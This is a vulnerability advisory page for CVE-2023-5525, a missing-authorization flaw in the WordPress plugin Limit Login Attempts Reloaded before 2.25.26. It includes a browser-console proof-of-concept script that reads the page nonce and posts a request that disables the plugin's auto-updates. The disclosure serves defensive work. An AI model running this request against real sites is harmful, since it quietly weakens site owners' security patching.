Lucene search
Alex SanfordWPEX-ID:654BAD15-1C88-446A-B28B-5A412CC0399DHistoryNov 06, 2023 - 12:00 a.m.
Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update
2023-11-0600:00:00
Alex Sanford
41
admin
limit login attempts
missing authorization
auto-update
exploit
Description The plugin is missing authorization on the toggle_auto_update AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.
As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:
nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
await (await fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": "action=toggle_auto_update&value=no&sec=" + nonce,
"method": "POST",
"mode": "cors",
"credentials": "include"
})).text();
Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.Related
nvd
nvd
CVE-2023-5525
2023-11-27 17:15:08
cve
cve
CVE-2023-5525
2023-11-27 17:15:08
wpvulndb
wpvulndb
openvas
openvas
cvelist
cvelist
prion
prion
Authorization
2023-11-27 17:15:00
4.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.1%
Related for WPEX-ID:654BAD15-1C88-446A-B28B-5A412CC0399D